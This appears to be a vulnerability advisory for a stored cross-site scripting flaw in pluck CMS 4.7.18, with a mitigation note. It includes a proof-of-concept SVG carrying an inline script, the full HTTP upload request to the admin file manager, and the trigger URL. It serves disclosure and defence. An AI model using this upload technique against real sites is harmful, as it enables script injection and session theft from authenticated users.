pluck v4.7.18 - Stored Cross-Site Scripting (XSS)

vendor:

pluck

by:

Mirabbas Agalarov

7.4

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: pluck

Affected Version From: 4.7.18

Affected Version To: 4.7.18

Patch Exists: NO

Related CWE:

CPE: a:pluck:pluck

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

pluck v4.7.18 – Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability exists in pluck v4.7.18. An attacker can upload a malicious SVG file containing JavaScript code to the application, which will be executed when the file is accessed by an authenticated user.

Mitigation:

Input validation should be used to prevent malicious code from being uploaded to the application. Additionally, the application should be configured to only allow the upload of files with specific extensions.

Source

Exploit-DB raw data:

Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs:  XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. create .svg file.
2. svg file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)

poc request


POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close

------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--



4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg